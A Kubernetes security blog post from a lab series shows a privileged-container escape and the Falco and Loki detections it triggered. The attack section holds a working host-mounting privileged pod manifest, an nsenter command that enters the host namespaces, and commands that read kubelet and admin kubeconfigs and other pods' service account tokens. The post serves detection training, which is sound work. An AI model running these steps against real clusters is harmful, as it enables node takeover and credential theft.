Christopher Azzopardi

Posted on Jun 5 • Edited on Jun 7 • Originally published at Medium

I Escaped a Privileged Kubernetes Container — Here's What Falco Saw

#kubernetes #security #devops #falco

Build Log: Project 1 — K8s SOC Foundation | Attack 2 of 4

The container had root on the node within 90 seconds of starting.

Not root inside the container. Root on the actual Kubernetes node — access to the host filesystem, the kubelet credentials, the node's process table, everything. From inside a pod.

This is the privileged container escape. It's one of the most well-documented Kubernetes attack techniques, it's in every red team playbook for cloud-native environments, and it works exactly as advertised when a cluster isn't hardened against it.

This is Attack 2 in my four-attack detection series. Attack 1 covered cryptominer deployment. This one goes deeper — the impact is higher, the Falco detection is richer, and the evidence trail is more instructive.

Why Privileged Containers Are a Critical Risk

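A privileged container runs with privileged: true in its security context. That setting grants every Linux capability, exposes the host's devices, and lifts the seccomp and AppArmor confinement the runtime normally applies. The namespaces themselves stay in place unless the pod also sets hostPID, hostNetwork, or hostIPC, but a process with this much privilege can step out of them, so it is effectively equivalent to a root process on the node itself.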

In practice, this means:

Full access to the host filesystem, for example by entering /proc/1/ns/mnt when the pod also shares the host PID namespace
Ability to load and unload kernel modules
Access to raw network interfaces
Visibility into all processes running on the node
Access to node-level credentials — including the kubelet's kubeconfig
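
One quick way to see the difference from inside a pod is to look at the effective capability mask. The sketch below is a hypothetical helper (has_cap_sys_admin is not part of the original lab) that tests whether a CapEff hex value includes CAP_SYS_ADMIN, which is capability number 21 in the kernel headers. Treat it as an illustration rather than a complete privilege audit.

```shell
# Hypothetical helper: does a CapEff hex mask include CAP_SYS_ADMIN?
# CAP_SYS_ADMIN is capability number 21 in <linux/capability.h>.
has_cap_sys_admin() {
  # $1 is the hex mask without a 0x prefix, e.g. 000001ffffffffff
  [ $(( (0x$1 >> 21) & 1 )) -eq 1 ]
}

# Usage inside a container (reads this process's effective capabilities):
#   mask=$(awk '/^CapEff/ {print $2}' /proc/self/status)
#   has_cap_sys_admin "$mask" && echo "CAP_SYS_ADMIN present"
```

A container running with the runtime's default capability set typically reports a mask such as 00000000a80425fb, where bit 21 is clear. A privileged container reports a mask with every capability the kernel supports switched on.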

Privileged containers have legitimate uses: certain CNI plugins, node-level monitoring agents, some storage drivers. That legitimate use case is exactly why this attack vector persists — misconfigured workloads, copy-pasted manifests, and overly permissive RBAC all create openings.

TeamTNT, the Hildegard malware campaign, and multiple other threat actors have used privileged container access to break out to the node and move laterally through Kubernetes clusters. This isn't theoretical.

MITRE ATT&CK Mapping

Technique ID	Name	What it maps to
T1611	Escape to Host	nsenter into host mount namespace
T1068	Exploitation for Privilege Escalation	privileged flag granting host-level capabilities
T1552.004	Unsecured Credentials: Credentials in Files	reading kubelet kubeconfig from host filesystem
T1082	System Information Discovery	enumerating host processes and filesystem post-escape
T1078.004	Valid Accounts: Cloud Accounts	using harvested credentials for lateral movement

The Attack

Step 1 — Deploy the Privileged Pod

# attack-02-privileged-escape.yaml
apiVersion: v1
kind: Pod
metadata:
  name: privileged-escape
  namespace: attack-sim
  labels:
    app: node-agent    # Generic label to blend in
spec:
  containers:
  - name: privileged-escape
    image: ubuntu:22.04
    command: ["/bin/bash", "-c", "sleep infinity"]
    securityContext:
      privileged: true        # Full host capabilities
      runAsUser: 0
    volumeMounts:
    - name: host-root
      mountPath: /host         # Host filesystem mounted at /host
  hostPID: true                # Access to host PID namespace
  hostNetwork: true            # Access to host network namespace
  volumes:
  - name: host-root
    hostPath:
      path: /                  # Entire host filesystem

kubectl apply -f attack-02-privileged-escape.yaml
kubectl exec -it privileged-escape -n attack-sim -- /bin/bash

The pod starts in seconds. We're inside a container — for now.

Step 2 — Escape to Host via nsenter

# Inside the container
# nsenter joins the host's mount, UTS, IPC, network, and PID namespaces.
# /proc/1 is the host's init process here because the pod sets hostPID: true.
nsenter --mount=/proc/1/ns/mnt --uts=/proc/1/ns/uts \
        --ipc=/proc/1/ns/ipc --net=/proc/1/ns/net \
        --pid=/proc/1/ns/pid -- /bin/bash

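We're no longer in the container's namespaces. We're in the host's. If the pod was scheduled onto a control-plane node, as the admin.conf and PKI paths in the next step assume, this is the same machine that runs the Kubernetes control plane.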

# Verify we're on the host
hostname      # Returns the node hostname, not the pod name
cat /etc/os-release   # Host OS, not container OS
ps aux        # All host processes visible
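
A more direct check than comparing hostnames is to compare namespace identifiers. The sketch below assumes a Linux /proc filesystem; same_namespace is a hypothetical helper name, not something from the lab repo. It compares the namespace link of two processes for a given namespace type.

```shell
# Hypothetical helper: are two processes in the same namespace of a given type?
# $1 = namespace type (mnt, pid, net, uts, ipc), $2 and $3 = PIDs (or "self").
# Returns 0 if the namespaces match, 1 if they differ, 2 if a link is unreadable.
same_namespace() (
  a=$(readlink "/proc/$2/ns/$1" 2>/dev/null) || exit 2
  b=$(readlink "/proc/$3/ns/$1" 2>/dev/null) || exit 2
  [ "$a" = "$b" ]
)

# Usage (PID 1 is the host's init when hostPID is true):
#   same_namespace mnt self 1 && echo "sharing the host mount namespace"
```

Run before the nsenter call, the mount namespace comparison against PID 1 should fail. Run from the shell that nsenter spawned, it should succeed.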

Step 3 — Harvest Node Credentials

From the host namespace, the kubelet's credentials are readable:

# Kubelet kubeconfig — contains cluster credentials
cat /etc/kubernetes/kubelet.conf

# PKI certificates
ls -la /etc/kubernetes/pki/

# Kubelet client certificate
cat /var/lib/kubelet/pki/kubelet-client-current.pem

# Any kubeadm-stored credentials
cat /etc/kubernetes/admin.conf 2>/dev/null

# Check what the kubelet credential can access
KUBECONFIG=/etc/kubernetes/kubelet.conf kubectl auth can-i --list

The kubelet credential won't have cluster-admin access, but it will have node-level access — enough for further lateral movement, reading secrets mounted to pods on this node, and potentially pivoting to other nodes.

Step 4 — Read Secrets From Host Filesystem

Secrets mounted into pods on this node are accessible directly from the host filesystem:

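# Run from the host namespace entered in Step 2.
# (From the container's own mount namespace, prefix these paths with /host.)

# Find secret volumes mounted into pods on this node
find /var/lib/kubelet/pods -type d -path "*/volumes/kubernetes.io~secret/*" 2>/dev/null | head -20

# Locate service account tokens belonging to other pods
find /var/lib/kubelet/pods -path "*kubernetes.io~projected*" -name token 2>/dev/null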

This is the real impact. The escape gives you access not just to this pod's credentials but to the credentials of every pod running on the same node.
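
Service account tokens are JWTs, so the identity behind a harvested token can be read without contacting the API server. The following is a minimal sketch, assuming a base64 utility that accepts -d; jwt_payload is a hypothetical helper name. It decodes the payload segment only and does not verify the signature.

```shell
# Hypothetical helper: print the decoded payload (claims) of a JWT.
# $1 = the token string in header.payload.signature form.
jwt_payload() (
  # Take the middle segment and map base64url characters back to base64.
  payload=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
  # Restore the '=' padding that base64url encoding strips.
  case $(( ${#payload} % 4 )) in
    2) payload="${payload}==" ;;
    3) payload="${payload}=" ;;
  esac
  printf '%s' "$payload" | base64 -d
)

# Usage:
#   jwt_payload "$(cat /path/to/token)"
```

For a Kubernetes service account token, the sub claim has the form system:serviceaccount:<namespace>:<name>, which tells a defender exactly which identities were exposed on the compromised node.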

The Detection: What Falco Saw

Four rules fired. In sequence, they tell the complete attack story.

Alert 1 — Privileged Container Launched

This fires at pod start — before any escape attempt:

{
  "output": "Warning Privileged container started 
    (user=root image=ubuntu:22.04 
    k8s.ns=attack-sim k8s.pod.name=privileged-escape 
    container.privileged=true 
    evt.type=container)",
  "priority": "Warning",
  "rule": "Launch Privileged Container",
  "tags": ["container", "mitre_privilege_escalation", "T1068"]
}

A privileged container starting is itself a detection signal — regardless of what happens next. In a hardened cluster, this is where the story should end: the admission controller rejects the manifest and the pod never starts. Here it runs, and Falco immediately surfaces it.

Alert 2 — Host Namespace Entered via nsenter

{
  "output": "Warning Namespace change (setns) by unexpected program 
    (user=root proc.name=nsenter proc.cmdline=nsenter --mount=/proc/1/ns/mnt 
    k8s.ns=attack-sim k8s.pod.name=privileged-escape 
    proc.pname=bash evt.type=setns)",
  "priority": "Warning",
  "rule": "Change thread namespace",
  "tags": ["process", "mitre_privilege_escalation", "T1611"]
}

The setns syscall is what nsenter uses to switch namespaces. Falco watches at the syscall level — it saw the exact moment the escape happened.

Alert 3 — Sensitive File Read From Host

{
  "output": "Warning Sensitive file opened for reading by non-trusted program 
    (user=root proc.name=cat 
    fd.name=/etc/kubernetes/kubelet.conf 
    k8s.ns=attack-sim k8s.pod.name=privileged-escape)",
  "priority": "Warning", 
  "rule": "Read sensitive file untrusted",
  "tags": ["filesystem", "mitre_credential_access", "T1552.004"]
}

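Reading kubelet.conf from a container, even one running as root, is abnormal. Falco's sensitive file rules are driven by lists of credential and configuration paths. The stock lists centre on files such as /etc/shadow and /etc/sudoers, so confirm that paths like /etc/kubernetes/, /var/lib/kubelet/pki/, and /root/.kube/ are present in your ruleset and add them if they are not.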

Alert 4 — Container Launched With Sensitive Mount

{
  "output": "Warning Container launched with sensitive mount 
    (user=root image=ubuntu:22.04 
    k8s.pod.name=privileged-escape 
    k8s.ns=attack-sim 
    fd.name=/ mounts=/ 
    evt.type=container)",
  "priority": "Warning",
  "rule": "Launch Sensitive Mount Container",
  "tags": ["container", "mitre_discovery", "T1082"]
}

The host filesystem mount at /host triggered this rule at container start, in parallel with Alert 1. Two separate rules firing simultaneously for the same pod is a strong signal — correlated alerts are harder to explain away as false positives.
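
The correlation idea can be sketched in a few lines of shell. This assumes the alerts have already been reduced to tab-separated "pod<TAB>rule" lines, which is a hypothetical intermediate format and not something Falco emits directly. correlated_pods prints every pod that triggered at least two distinct rules.

```shell
# Hypothetical helper: list pods that triggered two or more distinct rules.
# stdin: one alert per line in the form "<pod name><TAB><rule name>".
correlated_pods() {
  awk -F'\t' '
    # Count each (pod, rule) pair once, however many times it fired.
    !seen[$1 FS $2]++ { count[$1]++ }
    END { for (p in count) if (count[p] >= 2) print p }
  ' | sort
}

# Usage:
#   printf 'privileged-escape\tLaunch Privileged Container\n' | correlated_pods
```

Counting distinct rules rather than raw alert volume keeps a single noisy rule from looking like corroboration.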

The Loki Timeline

{namespace="attack-sim", pod="privileged-escape"} 
  | json 
  | line_format "{{.time}} | {{.priority}} | {{.rule}}"

T+00:00  Pod scheduled
T+00:08  Container started
T+00:09  ALERT: Launch Privileged Container [Warning]
T+00:09  ALERT: Launch Sensitive Mount Container [Warning]
T+00:41  kubectl exec shell opened
T+01:12  ALERT: Change thread namespace — nsenter [Warning]
T+01:34  ALERT: Read sensitive file — kubelet.conf [Warning]
T+01:47  Falcosidekick: Slack notification batch delivered

The first two alerts fire at container start, 32 seconds before we even exec into the pod (T+00:09 versus T+00:41). By the time we attempted the escape, a real SOC would already have an open incident for a privileged container in the attack-sim namespace.
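
The lead time can be checked directly from the timeline offsets. The helpers below are a small sketch with hypothetical names (to_seconds, lead_time) that convert MM:SS offsets to seconds and subtract them.

```shell
# Hypothetical helpers for working with the T+MM:SS offsets in the timeline.
# to_seconds: convert "MM:SS" to a number of seconds.
to_seconds() (
  m=${1%%:*}
  s=${1##*:}
  # Strip one leading zero so values like "09" are not parsed as octal.
  echo $(( ${m#0} * 60 + ${s#0} ))
)

# lead_time: seconds elapsed between two offsets ($1 earlier, $2 later).
lead_time() {
  echo $(( $(to_seconds "$2") - $(to_seconds "$1") ))
}

# Usage: gap between the container-start alerts and the exec session
#   lead_time 00:09 00:41
```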

Comparing Attack 1 and Attack 2

Both attacks were caught. The nature of the detection is different and worth understanding.

The cryptominer (Attack 1) produced behavioural signals: outbound network connection to a mining pool, an unexpected process making external connections. The detection was based on what the container did.

The privileged escape produced structural signals: a container with privileged: true, a host filesystem mount, a namespace-change syscall. The detection was based on what the container was configured to be. Two of the four alerts fired before any malicious action took place.

This distinction matters for defenders. Behavioural detection catches attacks in progress. Structural detection can surface risk before exploitation begins. A mature detection programme needs both.

What Prevention Looks Like (Project 3 Preview)

In Project 3, after CKS, the same manifest gets stopped at the admission controller:

OPA Gatekeeper will reject any pod spec with privileged: true or hostPID: true — the pod never gets scheduled.

Kyverno will enforce a disallow-privileged-containers ClusterPolicy, so the pod is rejected at the API server before the scheduler or kubelet even touches it.

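Seccomp profiles will block the setns syscall for ordinary workloads, so nsenter fails in any pod that runs with a profile applied. One caveat: Kubernetes runs privileged containers with seccomp unconfined, so this layer limits what non-privileged pods can do rather than containing a privileged pod that somehow runs.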

Three independent layers. The same four Falco alerts become zero because the workload is rejected before it runs. That's the Project 3 story.
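
Until those controls are in place, a crude pre-deployment check can at least flag the obvious fields in a manifest. The sketch below is a plain-text grep, not a YAML parser and not a substitute for admission control. lint_manifest is a hypothetical helper name, and it does not inspect hostPath volumes.

```shell
# Hypothetical helper: flag risky boolean fields in a pod manifest.
# Prints each offending line with its line number.
# Returns 1 if any risky field is set to true, 0 otherwise.
lint_manifest() {
  if grep -nE '^[[:space:]]*(privileged|hostPID|hostNetwork|hostIPC):[[:space:]]*true' "$1"; then
    return 1
  fi
  return 0
}

# Usage (for example in a CI step before kubectl apply):
#   lint_manifest attack-02-privileged-escape.yaml || echo "manifest needs review"
```

Run against the manifest from Step 1, this would report the privileged, hostPID, and hostNetwork lines.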

Key Takeaways for Defenders

Privileged containers are not just a risk — they're an incident waiting for a trigger. Any workload running with privileged: true that isn't a known, reviewed, explicitly necessary component should be treated as a finding, not a configuration choice.

nsenter is a legitimate admin tool and an attack tool. Most production workloads have no reason to call setns. An alert on this syscall from a non-system namespace is high-fidelity.

The sensitive file rules are undervalued. Falco ships with a comprehensive list of files and paths that should never be read by untrusted processes. Tuning these rules to your environment — whitelisting known-good readers — dramatically improves their signal-to-noise ratio.

Two correlated alerts at container start beat one alert during exploitation. If your detection only fires after the escape happens, you're already behind. Structural signals at container start give you the lead.

What's Next

Attack 3 covers service account token abuse — harvesting the default service account token mounted into a pod and using it to query the Kubernetes API for cluster intelligence. It's quieter than the privileged escape, harder to spot without the right rules, and maps directly to how real attackers move laterally through a compromised cluster.

Full manifests, Falco alert captures, and Loki query examples are in the repo: github.com/chrisazzo/k8s-soc-foundation

I'm building a DevSecOps portfolio targeting AI Security Architect contract work. Follow for Attacks 3 and 4, the hardening post, and the CKS build log.

← Previous: Attack 1 — Cryptominer Deployment

Next: Attack 3 — Service Account Token Abuse →
